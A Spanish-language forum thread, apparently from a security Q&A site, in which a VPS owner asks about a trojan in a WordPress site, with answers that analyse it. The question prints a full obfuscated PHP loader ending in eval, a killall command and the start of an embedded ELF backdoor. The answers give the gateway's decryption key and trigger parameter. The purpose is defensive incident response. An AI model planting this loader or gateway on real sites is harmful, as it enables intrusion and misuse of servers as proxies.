WordPress infectado con un troyano


Recientemente, nuestro servidor (un VPS con CentOS 6.5) comenzó a alojar un sitio WordPress que ya estaba infectado, o que se infectó poco después (al parecer a través del plugin RevSlider), con algún tipo de troyano; probablemente un emisor de spam, ya que acabamos en la lista negra de Spamhaus muy rápidamente.

El núcleo de la infección (creemos) es un pequeño archivo llamado system.php [enlace al pastebin],

que parece ser invocado desde un header.php del tema de WordPress que también fue modificado [enlace al pastebin].

Consiguió crear 4 tareas cron, y nos interesa mucho saber qué estaba haciendo exactamente. ¿Cómo puedo averiguarlo?

Editar:
Aquí está header.php

<?php for($o=0,$e='&\'()*+,-.:]^_'{|,,,|-((.(*,|)')&(_(*,+)'(-(,+_(-(.(:(](^(_('({)]+'+{+|,&-^-_(^)](](^(_(^(:('(,-_(.-_(](:(,+_(-+_(--_('(.(.+'+_(-(:(.(,+_(--^(.-_(:+{(]+{(:(:(^('(,(,(,(.(:(:(:+{(,(_(:(_+_(-)](](,(:-_(,,&(_,&+_(-('(:(.(,(.(.+_(-(.+'(,-_(.('(](.(_-^(,)](:({(,(,(_(](.(](.-^(,(,('(,(](:(.({(]-^+_(-(^+_(-(^(.(](,+'(',&(:+{(.-^(_-_('-_(]-^+_(-+{(:-^+_(--^(,(_(:(](,(_(')](:,&(.(,+_(-+{+_(-+|(:(^(,(^(.+{+_(-({(,(^(^(,(_+_(-(_)](.(.(.(](,+_(-(,,&(^('('(^(]-^(,(.(,(.(:-_+_(-(^(_)](.(.(.(](,+_(-(,,&(:(^(,(^(.+{+_(-({(,(^(^(,(_+_(-(_)](:(^(.-^(,(_(_(](]+|('('(.(.+_(--^(,(.(:+{+_(-+'('+_(-(:('(:-_(,,&(,-_(.+{(,+_(-(:)]('+_(-(.+{(_+_(-(_+'+_(-)]+_(-(_(,(.(:('(')]+_(-,&(:+'+_(--^(.(.('(_(,-^(:('(](]+_(-,&+_(-)](^({(:-_+_(--_(:,&(,)](:-^(:-_(,(](.+{+_(-(_(,+'(:(](:(_(:(,(,-_('+{(]-^(.('('-_+_(-(,(,(^(^-^+_(-('(,+'(:(_(:+|+_(-({('+{(],&(,(.(,(.(:-_+_(-(^+_(-)](](:(](^(_(:(')](^-_(_(:(^+'(_+'('+_(-(](^(_+_(-(^+{(^+{(^(,+_(-(.(:,&(,(:(:(_(](.(_(:(_,&+_(-(_(]-_+_(-)](^,&(,({(:+'(:+|(,)](:({(]+'(.(:(:(,(]+{(:(.(^(:(^(.(,({(:(:(:('(]+'(:(_+_(-(.(.-_(:(^(_+_(-(.+_(-(^(:+_(-(](,(.(:+|(:+|(](.('(](,(.(.+{(.(^(:(](:(^(^('(,+_(-+_(-({(.(_(:+_(-+_(-({(.(_(],&(_(_+_(-(_(,,&(:(,(^({+_(-+_(-+_(--_(:+{(:(_(,(](,+|(,-_(:(.(:-_+_(-({(:+_(-(](^(^+'(]+|(.(.(:({+_(-)](.(,+_(--^(.(.(.(]+_(--^(_(.+_(--_(^+{(^(,(^({(:,&(,-_(:(^(,(:(.(](:(:(](:(_(.(^-^+_(-(:+_(-({(,,&(.+'+_(-(:(.(,+_(--^(.-_(:+{(]+|(_)]('(_+_(-(]+_(--^(:+|(:+'+_(--^(:+'(,(^(.(](,)](,-^(:,&(^-_(,+_(-+_(--_(.+_(-('+_(-(],&(.(,+_(-(:(:)](.(.(,-^(.({+_(-+_(-(^+{(](.(_)](^(:(,-^(:(_(,+|(.(:(:({(,-^(_,&+_(-+_(-+_(-+'(,+'(.+_(-(,(_+_(-)](:+{(,-_(.(_(:+'(:(](.(,(]-^+_(-('(,({('(^('(^(.+'(:(^+_(--_(.(](:(^+_(--_(.+|(^)]+_(-+|(:(](:('(.+_(-(,(:(.(,+_(--^(:)]('-^(]+|(:(_(^-^+_(-('(,('(:-^(,(_(,-_(.+{(,-_(.)]('+_(-(](.(_+|(,,&('({(,-_(:('(:-_(,(:(:,&(,-_(_(.('+_(-(,(:(.(](](^(.,&+_(-+{(:,&(.)](,-_(:,&(],&(_(_+_(-(_(,,&(:(,(^({+_(-+_(-+_(--_(:+{(:(_(,(](,+|(,-_(:(.(:-_+_(-({(:+_(-(](^(^+'(]+|(.(.(:(_+_(-+'(:(_(,(](_,&('-_(](.('-^(:+|
+_(-(_(,-^(:(](:(,(,(](:(_(](.(_,&(:-^(,+'(:(_(_)](,(.+_(-)](:,&(:+'(:(^(:+|+_(-+'(.-_(:({(]+|(_)]('(_+_(-(]+_(--^(:+|(:+'+_(--^(:+'(,(^(.(](,)](,-^(:,&(^-_(,+_(-+_(--_(.+_(-('+_(-(],&(.(:+_(-({(.(^(:(^(:(](.+'(](_+_(-('(,(^('(^('(,(](:(_({(_(,(.-^(:(:(,,&(.+|(^({+_(-('(](:('(^(:+_(-(,+{(.(,(:(^(.-_(.-^(,-^(.(_+_(-+_(-(^-^(.+{(:(](.+|(,(](:(,+_(--^(.(:(:)](,(^+_(-+'(^(:(,+'(,(.(.+_(-(.,&+_(-)]('+{(],&(.-_(.-^(,-^(.(_+_(-+_(-(^+{(](.(_)](^(:(,-^(:(_(,+|(.(:(:({(,-^(_,&+_(-+_(-+_(-+_(-(,+'(:+|(,(_(,-_(.+{(,-_(.)]('+_(-(]('(_,&(^-^+_(-(:+_(-({(,,&(.)](,+{(.(,+_(-)](:-^(:-^+_(-)](:(,(]+'(,-^(,(:(:(:(.+'(:(^(.(,+_(-(:(:)](.(.(,-^(.({(]+'(,-^(,(:(:(:(.+'(:(^(.(,(,(.(.-_(:+'(,('+_(-+'(^(:(,+'(,-^(:+_(-(.(^+_(-(_(:+{(,+{(:)](,)]+_(-+{(.+'(](_+_(-('(,(^(.-^(.(^(,(.(:(.+_(-)]+_(-(^(.(_+_(-)](.+'(^(^(.,&(,(](.(.(:+|(,(](.-_+_(-(_(.(.(:('+_(-({+_(-+'(^(:(,+'(,-^(:+_(-('(,(](:(_({(_(,(.(:(:(,(](:(_(](^(^+_(-(:(,(^(,,&(:+|+_(-(.(:(_(,)](_(:(.,&+_(-(:+_(-+'(^(.+_(-+{(,-^('+'('-^(,)](:(.(,(](_+'(:({(,(](:+_(-+_(-(_+_(-('+_(-(:(:('(:+'(^(,('(:(,(](.(^('(_(,,&(:(,(^({+_(-+_(-+_(--_(:+{(:(_(,(](.(,(]+'(.+{(.(,(,+'(.+|(^+'+_(-(:(,)](:-^(:+|(],&('+'(^+_(-(:('(^+|(](](_+'(^(^+_(-+'(,-^(:+_(-(:(.(]+'(:+'(,+|(_+'(.+_(-(,-^(_(^(^(^+_(-(:(,(^('(.(:+'(,(^(:,&(,+|(.(:(:+_(-(_+_(-(.+_(-(^(:+_(-(](,(.(:+|(:+|(](.('(](,(.(.+{(.(^(:(](.+|(^({+_(-+{(:(](:(^(:+|+_(--^('(](](_(,+'(:(,+_(--^(.+{(^(^(,(_(,(.(:,&(:('(:(^(:(_+_(-(.(.(:(.(^+_(--_(:(_+_(--^(^(^(,(.(:+|(:(,(:(^(:(](,-_(:-^('+_(-(](.(_+|(,,&('({(,-_(:('(:-_(,(:(:,&(,-_(_(.('+_(-(,(:(.(](](^(.,&(,(.(:+|(:(,(:(^(:(](,-_(:-^(,)](,+'(.)](^+'(^(^(]('+_(-(.(:-_+_(--_(:,&(,)](:-^(:-_(,(](.+{(_)]+_(-('+_(-(:(:+{(.+'+_(--^(.(,(](.(_,&(:-_(,(^(.+|(_)]+_(-(^(,-^(.(_(,(_(,+{(:-_(,(_(_,&('-_(](.('-^(:+|+_(-(_(,-^(:(](:(,(,(](:(_(](.(_,&(:(^(,+'(.+{(_)]+_(-+_(-(,(](:+|(:-_(,(:(:(](],&(_(_('-^(,(:(.(](](^(.,&(,(.(:+|(:(,(:(^(:(](,-_(:-^(.+'+_(-('(.,&(^('(,+_(-(:(](:+{(:('(,(:(,+|(,,&(.-_(.(.(:(](.(](^+'+_(--^(](.('+{(_(.(_(,(:+'(,+|(_(.('('(,({(.(](^({(.,&
(,({(:,&(:('(,+|(:+'(,,&(_(:(.,&+_(-(:+_(-+'(^(.+_(-+{(,-^('+'('-^(,)](:(.(,(](_+'(:({(,(](:+_(-+_(-(_+_(-+_(-(,(](:+|(:-_(,(:(:(](],&(_(:(_,&+_(-(_(]-_+_(-)](^,&(,+|(:('(.,&(]+'(:(,(,(^(.(](:(,(,(.(.(.+_(-(_(,(](,+'(:-^(.+|(,-_(^)](,+|(:-_(:({(,({(:+_(-(^-_+_(-,&(,(^('(.(.+_(-(:(^(:+'(,(](.(:(,)](,+|(.(,(](.(^+'(]-_(:+|('(,+_(-+_(-(:+'(,+|(_(.(:-^(,+'(:(_(_)]+_(-+{(,(^(:+{(,(_(,,&(:(_+_(--^(_(:(.,&+_(-)](.(,(](.(,('+_(-)](:+|('+_(-(.+'(:+'(,(](.(:(,)](,+|(.(,(](.(^+'(]-_(:+|('(,(](:(_({+_(-('(.-_(:+'+_(-({(.(,(^-_+_(-(](](:(:+'(:({+_(-)](,+|(,(:(.(](:-_(:(](.(.(^(:(,(_(:(](:(:(:(^(,(_('+'+_(-+_(-(_-^(:-^(^(_(,(^(^-_+_(-+|(,(.(,,&(:-^(,-_(.('(:(^(.+{(:+'(,('(_,&+_(--_(])]+_(-)](:('(.,&+_(--_(.+_(-(,(](_(.('(.(,(:+_(--^+_(-(.+_(-+|(:(_(,)]('-^(,(_(:+|(,)](.+{(:+'(:(](:(:(^('+_(--^+_(--^(:('('-^(:('('+'(^+_(-(:('(.+{(_+_(-(_+'+_(-)](^(.(,({(:+'(:+|(,)](:({(]+'(:)](:('(,,&(.(,+_(-(_+_(--_(,(](:(_(:+|(_(,(:+'(,+|(_(.(.-^(:(](.+|(^({+_(-+{(:(](:(^(:+|+_(--^('+{(],&(:)](:('(,,&(.(,(_)]+_(--_(,(](:(_(:+|(],&('+'(](:(:+_(-(.-^(:(](.+_(-(^-_+_(-('(](:('(^(:+'(,+{(:,&(]+'(.(](:)]+_(--_(_(^(^(:(,+'(,-^(:+_(-(_(:(]+'(.(,(,+{(.+|(:(:(]+{(.({(^)]+_(-(_(,-^('(.(:({(,)](.('(,(:(:+|(:(:(]+|(_+|(,,&(,-_(_+_(-(',&('(_+_(-)](:-^(,+{(:({(.(.(]+{(.(,(]-^+_(-('(,({('(.(:+_(-(,-_(:-_+_(-+'(.-_(.(]+_(-({(]-_(^(,(,('(,(^(:+_(-(.,&(,(:(:+|(,(](_+'(.-^(:(](:(^(^('(,+_(-+_(-({(.(_(:+_(-+_(-({(.(_(](.(_-^(:(^(](.(:-^('(_(,(.(,+'(.+_(-(.+'+_(--^(:+{+_(-({(:-_('-^(]-_(.(_+_(--_(])]+_(-(_(^({(:-_+_(--_(:,&(,)](:-^(:-_(,(](.+{+_(-(_(,+'(:(](.+_(-(.(,+_(-)](.('(,-_(.('('-^(]-_(.(_+_(--_(,)](.+{(.+_(-(.(,+_(-)](.('(,-_(.('('-^(]-_(.(_+_(--_(])]+_(-(_(^({(:-_+_(--_(:,&(,)](:-^(:-_(,(](.+{+_(-(_(,+'(:(](.+_(-(:+_(-(,-_(:-_(,(_+_(-(^(:(:+_(-(:(.(,(^(^(^+'(]-_(:+_(-('(,+_(-+_(-(:(_(,)](.(.(:)](]+{(,(^(](^+_(-+'(,-^(:-^(:(^(:(^(:(_+_(-(.(.-_(:(^(](:(_+_(-(^(^(^+{(^(,(.-_(^(:(,+|(.(_(,(](.)](.(.(,(.(.+'(^({(^(.+_(-(:(,,&(.)](,(^(.(:(,-_(.(]('-^(]-_(.(_+_(--_(,)](]-_(:,&(_(.(,(:(:(^(](.(_(.('(.(,,&('({('(_(,
(.(,(](.(.(:+|(,(]('+{(]-^(.)]('+'(]+|(:('+_(-+_(-(^+{(](.('+{(.(.+_(-,&(:+{(,(:(.(_(:(:(](:(_(]('(_+_(-(](,-^(:,&(:-_(](.('('(,+|(_(:('-_+_(-(,(_+_(-(^)](^+|(^(_+_(-(.(:-_(,,&(:(_+_(--^(:)]('-^(]-_(.(:+_(--_(])]+_(-(_+_(-(.(.)](,)](:-_(,(^(:)](:(:(](:(_+_(-(^(,(^+{(^(,(.-_(:+|(,)](:+{(,(^(_+'('(.(,(]('-^(]+{('({(,,&(.('(:('(,)](.('(,(:(.(^(:({(]+{(:,&(_)](,(.+_(-)](:,&(:+'(:(^(:+|+_(-+'(.-_(:({(](:(_+_(-(^(^(^+{+_(-(,('(_(:(_(^+_(-(:+'(,+|(_(.+_(-(_(,(.(:(_(_)](,(,(,-^(.+_(-(:(_+_(--_(.+_(-(,)](.-_('-^(]-_(:(^(,+{(:(.+_(-+{(.(,(:(_(,)](,+|(,(^(:+'(:(:(,(^(_,&+_(-(.+_(-+_(-(]('(:(:(.+{+_(-({(:(.+_(-(:(_(.(_(_(^(_('+{(^('(,(,+_(-)](:(:(.(,(](.('(]+_(-+'(.(:(.(_(,-^(_(.+_(-+'(^(^+_(-)]('(^('(,(](_(_(.(^('('(](:('+_(-)](:('(^('(,+{(](:('(^(.)](,(:(.(:(,-_(_,&('+'(]+|(:(.+_(-+_(-(^+{(]('(_(,(_(](^(](:(.+_(-({(:({(:('+_(-(.(_,&+_(-+_(-(,(.(,(.(.(.(:+|(],&('-_(],&(:,&('+_(-(](.(_+|+_(-+'(^(_(,,&('+{('(,(](:(.({(.+'(.+|(:(^(,('(.+'(](^+_(-('(](:('(_(:-_(:+_(-(_(:(:('(_(:(_,&+_(-+|(.,&(^-_+_(--^(,-^('+'('({(.+'(:(^(,-_(.(^(:(,(](:(_+_(-(^(,(.)](^+'(,-_('(,(](:(.({(]-^(.(^('({(^(_(,(^(^(,+_(-(^(,-^(.(_(.+'(](.('('(,+|+_(-+_(-(_('(:(_(_+|(,,&(,-_(.+{(:(](:+'(,(_(:+|+_(-)](.-_('-^(]-_(.(:(_,&(](:(:(_('+{(_(.(.+'(.(:+_(-({(.(^(:(^(:(](.(_(^+'+_(-,&+_(-({(:('('+_(-(]-^(.(:(](:('+_(-(.+{(,-^(.(_(^-^+_(-,&(]+{('(_(:(_(^+_(-(.-^(_(,(.+|(.(:(,(^(.(_(](.+_(-+{(,(](:+|(')]+_(-(.(,+|(,-_(:(.(:(:(,({(_,&+_(-(.+_(-+_(-(](.(.)](',&(,(^(_({(.+'(.-_(.-^(,-^(.(_+_(--^(^(_(,({('-^(',&(,(^('+'(^+_(-(.-_(:(^(,(:(.+'+_(-(_(:(.(,(.(:-_(.)](,(_(:+|(,-^(.-_('-^(])]+_(-)](^({(^(,(]('('(_(:(_(](:(_({+_(-('(](,(')](](](.+_(-(^)](^(.+_(-({(:-_(:({+_(-({(.('(]+'(.+|(:(:+_(--_(.(_(^-^('({(,,&(.('(:('(,)](.('(,(:(.(^(:({(]+{(:,&(_)](,+_(-+_(--^(.(.(:+|+_(-({(:(^(,-_(:-^(:(^(,(:(_,&+_(-(.+_(-(:(]('('(_(.)](](_('('+_(-({(_(_('(.(,('(_+|(:+|(,)](_+_(-(^+{(:(,(,+|('+{(]-^(:)](_+{(.+{(.(:(](^+_(-,&(,({(:)](:(_+_(-+'(:(_(,(](_(.('(.(,+'(_)]+_(-(.(,(.(](.('+{(^(:(_(:(.({(_(,(](:(^-_(,(.(.(:+_(--^(^(_(,,&(_-_+_(-
)](,+|(:+|+_(-+'(.-_(:({(](:(_+_(-(^+'(^-^(])](.(^(:+{(]({('+'(](:(](,(^-_(_(.(:-^(:+|('+{(_(.(^+{+_(-)](,+|(.(]+_(-({(.(:(.(.(,-^(_,&+_(-(.(,+_(-(]('('(,+_(--^(.-_(,('(]+'(_({('({(]-_(:('+_(-({(^(,(]+{+_(-+'(,,&(:-^(,(:(](^('+{('({(^+{+_(-)](](](.-^(,(^(,-^(.+{(:(_(:,&(]({(_(:(_,&(_+_(-(]+|(:-_('+{+_(-+|(:+'(:(,(,(_(:(_(](.(_+{+_(-(_(,,&(.(,(^)]+_(-(](](:('(_(.+'(](:('+'(_(,(](:(^-_(_(.(:-^(:+|('+{(_(.(^+{(^(,(]-^(:+_(-(^('(,+'(:(,+_(-)](.(,(^('+_(-(_(](:('(_(.+'(](_(_+{(^+{('(:(_(](](.('-^(:+|('+{(_(.(^+{(^(,(.+'(:(^+_(-,&(:({(:-_+_(--_(.(,+_(--^(^(_(,,&('-^(',&(,({('+'(^+_(-(](,(^-_(_(.(]+|(]+{('({(_(.(^+{(^(,(.+'(:(^(,)](.(_(:)]+_(-({(.(,+_(--^(^(_(,,&('+{(_(.(_(,(^+'(_(:(](:(:(:(,({(.,&(^)](^(.(])]+_(-,&+_(-(.(:(_(:,&(]({('+_(-(^+|(_(.(]+|(]+{('({(_(.(^+{+_(-)](,+|(:(,(,(_(.(^(.(^(,-^(_,&+_(-(.(,+_(-(](.(_)](^(:(_(:(.-^(_(,(:('(^+|(](](_+'(^(.+_(-,&(]+{(.+_(-(:(](,+{(.+_(-+_(--^(_+'(:(:+_(-(:(.(,(^(^('({(,,&(.('(:('(,)](.('(,(:(.(^(:({(]+{(:,&(_)](,+_(-(,(_(:(:(.+{+_(--^(,+|(,-_(:(.(:(:(,({(_,&+_(-(.+_(-+_(-(](.(^({(.(.(_(,(^+'(,(:(.+|('-^(]-_(.(_(,+{(]-_(^(_('(,(.-^(,(.(:+'(,)](.(.('(_+_(-({(:(,(](_+_(-('+_(-)](:(](:+|+_(--^(:(,(,(.(_+'(_('(^(^(_(^+_(-)]+_(-(_(,-^(.(]('(_(,(](.(_(,(_(.(_('(_(^)]('+{+_(-(_(^,&(,-_(:('(.-_(](^(:,&+_(--_(.(_(:+'(]+{(_(:+_(-(,(^(.(,-^(:+_(-(:+_(-(,(^('(:(.(^(,+_(-('(](](.(]-_(:-_(,)](_+_(-(^+{(^(,(,-_(:(,(,(.(.(^('(_(])](,+'(',&(.-^(,(^('(,(_(.(_(,(^+'+_(-('(](,(^-_(,-^(.)](](^+_(-('(,(.(:(]('+_(-(.+'(.(,+_(--^(:({(.(^+_(--_(:('+_(--^(^(_(,({('-^('+{+_(-)](.(_+_(-+'(.-_(.(](,,&(.(,(](.+_(-+_(-(,(:('(,('(,(](:(^)](_(:(:+_(-(^+|(_(.(]+|+_(-(.+_(-(:(^(_+_(-(.(:+|+_(-(.(.(:(,(_(.(^(:(.(,-^(_,&+_(-+_(-(^(.(]+|('-^(',&(,)]('+'(^+_(-(](,(^-_(_(.(:,&(_)](,+_(-+_(--^(.(.(:+|+_(-({(:(^(,-_(:-^(:(^(,(:(_,&+_(-(.+_(-(:(:(,(_(:(,(](](_('('(,+{+_(-+_(-(_(](:(_(_)]+_(-(.+_(-(:(:(,(_+_(-(,(](](_('('(,+{+_(-+_(-(_(.(:(_(_+|(,,&('({(_(.(.-_(^(:(_(:(:(_(,(_(:)](:(:(,(.(.(:+_(--^+_(-+'(,+'(.+_(-(,(_+_(-+'(:(.+_(-)](:)](.(.(,(:(:('(](:(^+{+_(-(,(.+'(,
(_+_(-+'(:(.+_(-)](:)](.(.(,(:(:('(](:(^+'(]-_(:+_(-('(,(^+_(-(.-^(_(,(](:(:(:(,('(:(_(^(:+_(-+{(,,&('+'(:+_(-(,+{(.(,(:(^(:)](.-_+_(-({(:+_(-(^(:+_(--_(](.(.)](.+_(-(:(^(.(,+_(-(:(:)](.(.(,-^(.({+_(--^(^(_(,({('+{(_(.+_(-('(^)](_(:(.-_(:+'+_(-({(.(,(^-_+_(-(](](:(:+'(:({+_(-)](,+|+_(-)](.(.(:(:(,('(.)](_)]+_(-('+_(-(:(:('(:+'(](:(.({+_(-(.+_(-(^(.(^(,(:(.(,(^+'+_(--^(:(](:('(.+_(-(,-_(:(,(](.(_-^(:(^(](.('-^(]+{('({(_(.(:('(:(^+_(-)](:(_(,(:(.+|('-^(,(:(.(](](^(.,&+_(-+{(:,&(.)](,-_(:,&(](:(:+_(-(.-^(:(](:(^(^)](,(.(,-^(:+|('+_(-(]-^(:(,(](:('+_(-(.+{(_+_(-(]+|(^(:+_(--^+_(-({(:('(:(,(,+|('+{(,(.(.+{(.(^(:(](:(^(](]+_(-,&(,({(,,&(:(_+_(-+'(:(_(,(](_(:(.,&+_(-(:+_(-+'(](_(,(,(,(](:+_(-(,(_(,(^(.(:(,-_(.(]('-^(]-_(.(_+_(--_(])]+_(-(_(^({(^(,(,-_(:-_+_(-)](.-_(:-_(,,&(_,&(^-^+_(-(:+_(-({(,,&(:+|+_(-(.(:(_(,)](_(:(.,&+_(-(:+_(-+'(^(:(,+'(,-^(:+_(-('+_(-(]-^(:(,(](:('+_(-(.+{(_+_(-(:({(:+|(^,&(](](:(^(:(_(_(,('('(,(]('('('+_(-(:({(.-_('+|(.(](,(,+_(-('(_-_+_(-({(:({(:({+_(-(:(:+|(]+|('-^(:+|(^(_(,({(_-_(',&(:(^+_(-(,(.(^(,(^+_(-,&(.(.(,(,(_,&(^(_(,(^(,-_(_(.(_(,(:+'(,+|(_(.+_(-(_(,-^(.({(](_(,(_+_(-(.('+'(',&(,)]('+'(](:(:+_(-('(.(,({('({+_(-(.(.,&(:+{+_(-,&(,+'(:-^(,({(]-^(.(](,+{(^(,(:({(:+|+_(-+{(,,&('+'+_(-)](,-_(:-^+_(-+'(:-^(.-_(](:(_+_(-(^(^(^+{(](.(.)](',&(,)](_-^(]-^+_(-(^+_(-+_(-(.-^+_(-+_(-(_,&(^(_(,(^(,-_(_(.+_(-('(^)](,(:(.+|('-^(.+{(.(.(^(:(,(_(:(](:-_(:({(,,&(:+'(,)]+_(-(^(.('+_(--^(.+'(](.+_(-('+_(-({(,,&(:-^+_(-+'(:(,(](.(_(:('-_+_(-(,(_+_(-(^(^(]-_+_(-({(.(_(.+{(,(:(.(:+_(-)](.(_(:('+_(-({(.,&(^(:(,+_(-(](:('(_(:+'(](:(_({+_(-('(](,(.-^(:(](:(_(^+{+_(-(:+_(-)](.(_(,(_(,-_(.+{(,-_(.)]('-^(]-_(.(_+_(--_(])](_+_(-(-(_(*,*)'(-(-)^*&,|-(,*(.(*,++^(*,|+'(:)^(*,|(^(^(:-^,:,,(.(*,|)_)\'),(:-^(*,.+^(*,++^(*,|+'+')'(*,|)^-',+,_-),+-^(*,*({)'*&,),.-((.(.(*,.+^(*,++^(*,|+'+')_)_)*(:(^(.(*,.+^(*,++^(^(^(*,|+'+'(:(:)^-'-',:,,(.(\'*&,:-)-),+-*(.(*+|+)*++(+,*++((:(:-^(*+|*)*|*|*^*:*+)'(,(**.+*+*+&+|*)*|*|*^*:*++|+,*\'+(+))^(*+|+&*|+)+*)'(,(**.+*+*+&+|+&*|+)+*+|+,*\'+(
+))^(*+|*-*++*)'(,(**.+*+*+&+|*-*++*+|+,*\'+(+))^-'(*,^)'(*+|*)*|*|*^*:*++^(-,^,+-:(-+')^,:,,(.,+,'-&-*-:(.(*,^(:(:-^(*,^)'(*+|+&*|+)+*+^(-,^,+-:(-+')^-',:,,(.,+,'-&-*-:(.(*,^(:(:-^(*,^)'(*+|*-*++*+^(-,^,+-:(-+')^-',:,,(.(\'*&,,-+,{,)-*,:,|,{+|,+-.,:-)-*-)(.(-,*,+,)-(-:-&-*(-(:(:-^,+-,,\',_(.(-,,-+,{,)-*,:,|,{(&,*,+,)-(-:-&-*(.(*,+(_(*,^(:-^,:,,(.(\'(*,^(:-^-(,+-*-+-(,{)^-'(*,+,_)'*&-)-*-(,_,+,{(.(*,+(:)^(*,^,_)'*&-)-*-(,_,+,{(.(*,^(:)^(*-(,_)'(*,+,_(+(*,^,_)^(*,,,_)'(*,+,_('(*-(,_)^,,,|-((.(*,|)')&)^(*,|)_(*,,,_)^(*,|(^)'(*,^,_(:-^(*-&)'*&-)-+,(-)-*-((.(*,+(_(*,|(_(*,^,_(:)^(*,*({)'(((*,^((+{(((*-&(()^-',:,,(.(*-(,_(:-^(*-&)'*&-)-+,(-)-*-((.(*,+(_(*,,,_(_(*-(,_(:)^(*,^)'*&-)-+,(-)-*-((.(*,^(_)&(_(*-(,_(:)^(*,*({)'(((*,^((+{(((*-&(()^-'-(,+-*-+-(,{(.(*,*(:)^-'(-(:)^-'(*,*)'*&,*,+,)-(-:-&-*(.(*,*(_(*,^(:)^,+-,,\',_(.(*,*(:)^',$d='';@ord($e[$o]);$o++){if($o<16){$h[$e[$o]]=$o;}else{$d.=@chr(($h[$e[$o]]<<4)+($h[$e[++$o]]));}}eval($d); ?>  

y aquí hay una parte de los comandos y de la codificación utilizados en system.php
(es demasiado grande para publicarlo aquí completo; vea el pastebin):

// Kill every running process named "host" with SIGKILL: basename("/usr/bin/host") evaluates to
// just "host", so this is `killall -9 host`; the leading "@" silences any PHP warning if system()
// is disabled or the command fails. Presumably done so the ELF payload embedded below can replace
// an already-running copy that masquerades as the system "host" binary — verify against the full
// system.php on the pastebin.
@system("killall -9 ".basename("/usr/bin/host"));
$so32 = "\x7f\x45\x4c\x46\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x03\x00\x01\x00\x00\x00\x20\x0d\x00\x00\x34\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x34\x00\x20\x00\x03  

¿Alguien reconoce el tipo de codificación, para que pueda decodificarlo e investigar más por mi cuenta?

Edición 2:
descubrimos que system.php incrusta el binario como una cadena PHP con escapes hexadecimales \xNN (versión decodificada [enlace]).
TL;DR: es un ejecutable ELF (los primeros bytes \x7f\x45\x4c\x46 son la firma "\x7fELF", y el \x01 que le sigue indica un binario de 32 bits, de ahí el nombre de la variable $so32). ¿Hay alguna forma de averiguar qué hace, aparte de ejecutarlo en una máquina de pruebas?

    
preguntado por RozzA, 01.09.2015 - 02:03

3 respuestas


Creo que eres el orgulloso propietario de una puerta trasera "libworker.so". Malware Must Die tiene un buen análisis de esta familia; léelo antes de ejecutar nada tú mismo. El autor de Malware Must Die no es hablante nativo de inglés, pero el análisis revela un montón de detalles.

Según Malware Must Die, el código PHP «descargador» se instala a través de una copia de "Web Shell by oRb", así que tendrás que revisar el sitio WordPress comprometido con lupa. Para empezar, yo haría grep de "eval(" en todos los archivos PHP (y también de base64_decode, gzinflate, str_rot13 y preg_replace con el modificador /e, que son los envoltorios habituales de estos eval), y compararía el núcleo de WordPress, los temas y los plugins con copias limpias de la misma versión, ya que las fechas de modificación de los archivos pueden haber sido manipuladas.

El segundo paste (header.php) parece un programa de tipo pasarela (gateway). Hay un par de niveles de ofuscación que esconden un programa con un fragmento de código cifrado y una rutina de descifrado que hace XOR bit a bit de una clave contra ese fragmento, y después evalúa (eval) el código descifrado. El nivel exterior, que es lo que se ve en el header.php publicado arriba, es un simple decodificador por tabla de nibbles: los primeros 16 caracteres de $e definen un alfabeto (cada carácter recibe el valor 0–15 de su posición), el resto de la cadena se lee por pares para reconstruir cada byte en $d, y al terminar se llama a eval($d); si sustituyes ese eval($d) por echo $d obtienes la siguiente capa sin ejecutarla. Dado que header.php contiene el código cifrado y la cadena de clave llega en una petición HTTP, ese código probablemente contiene un nombre de host, una dirección IP o algo que te permita rastrear el origen. Me atrevería a suponer que el código cifrado es una especie de pasarela de archivos: alguien llama a tu servidor web con la URL de header.php y una cookie especial, o algunos parámetros GET o POST, junto con un nombre de archivo; el código descifrado recupera el archivo de algún sitio y se lo devuelve a quien llamó a header.php. Pero eso es solo una conjetura.

Es posible que puedas recuperar la clave de cifrado si alguien invocó header.php mediante HTTP GET con un parámetro del tipo key=blahblah. Merece la pena revisar el access_log para comprobarlo, teniendo en cuenta que los parámetros enviados por POST o en cookies no quedan registrados en el access_log con la configuración por defecto.

ACTUALIZAR :

El texto cifrado de header.php se puede recuperar con la cadena de clave "SjJVkE6rkRYj" (12 caracteres ASCII, sin las comillas). Finalmente reconocí la rutina de descifrado y la busqué en Google. Hacker News tiene una buena explicación sobre cómo obtener la clave de un cifrado XOR. Hay un hilo de comentarios de Hacker News aún más antiguo sobre la misma clave/script, y lleva a un paste del mismo código que obtengo al descifrar tu header.php. Es el malware PHP "superfetch", y aunque es una pasarela de archivos, como predije más arriba, no contiene direcciones IP ni nombres de host. En su lugar, el código de la pasarela usa una URL que llega en un parámetro GET o POST llamado "SjJVkE6rkRYj", o en una cookie con ese mismo nombre. Es ingenioso, pero es solo ocultación, no seguridad: cualquiera que conozca el nombre del parámetro puede usar tu servidor como proxy. Ahora que conoces ese nombre, busca "SjJVkE6rkRYj" en el access_log: las peticiones que lo contengan te dirán desde qué direcciones IP se usó la pasarela y, si iban por GET, qué URLs se estaban recuperando a través de tu servidor.

    
respondido por Bruce Ediger, 01.09.2015 - 19:41

¿Has mirado en /var/spool/cron (en CentOS, un archivo por usuario: /var/spool/cron/<usuario>), /etc/crontab y los directorios /etc/cron.d, /etc/cron.hourly, /etc/cron.daily, etc.? Ahí deberías poder ver las tareas cron programadas. Revisa las de todos los usuarios con `crontab -l -u <usuario>`, y en particular las del usuario bajo el que corre el servidor web (apache/nobody), que es probablemente el que ejecutó el PHP malicioso y, por tanto, el dueño de esas 4 tareas.

Si ya has determinado que el archivo ELF formaba parte de la infección, respondiendo a la última parte de tu pregunta: ejecútalo únicamente en un entorno aislado (sandbox), por ejemplo una máquina virtual desechable sin acceso a la red o con la red interceptada, si quieres ver realmente lo que hace. Antes de llegar a eso puedes hacer análisis estático sin ejecutarlo: `file`, `strings`, `readelf -h`/`objdump -d` sobre el binario decodificado, y enviar su hash a un servicio público de análisis de malware para ver si ya está identificado. Espero que esto ayude.

    
respondido por shift_tab, 01.09.2015 - 17:58

La codificación del binario no es ningún shellcode especial: son simplemente escapes hexadecimales \xNN de PHP. Es posible que el ELF esté relacionado con la botnet Ramnit, aunque aquí no se aporta ninguna evidencia de esa atribución, y la otra respuesta lo identifica como la puerta trasera libworker.so.

    
respondido por Alex Davies, 02.09.2015 - 08:20
